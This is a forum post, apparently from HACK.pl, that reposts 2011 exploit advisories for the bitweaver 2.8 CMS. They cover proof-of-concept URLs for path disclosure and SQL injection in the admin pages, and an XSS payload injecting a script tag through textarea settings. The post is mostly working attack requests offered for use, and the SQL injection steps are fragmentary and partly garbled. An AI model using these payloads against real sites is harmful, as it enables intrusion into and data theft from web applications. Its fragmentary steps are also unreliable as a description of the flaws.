Path disclo/sqli in bitweaver 2.8.1
2011-02-22 12:37 24_persistant.xss_bitweaver2.8.1.txt
2011-02-25 19:31 26_path.disclosure_bitweaver.2.8.txt
2011-02-25 22:29 27_sql_bitweaver.2.8.txt
Kod:# exploit title: Path Disclosure bitweaver 2.8 # date: 25.o2.2o11 # author: lemlajt # software : bitweaver # version: 2.8 # tested on: linux # cve : # PoC : http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27 bonus: xss POST http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php? $liberty_textarea_height = "><...> $liberty_textarea_width = "><script>here</script>Kod:# exploit title: sql injection in bitweaver 2.8 # date: 25.o2.2o11 # author: lemlajt # software : bitweaver @ sourceforge # version: 2.8 # tested on: linux # cve : # PoC : 1. Goto: http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc 2. Data Tamper: $find = ' sql $sort_mode = $format_guid = $list_page = ;/
Odpowiedź z Cytatem
Copyright © 2006-2024 - HACK.pl. Wszelkie prawa zastrzeżone.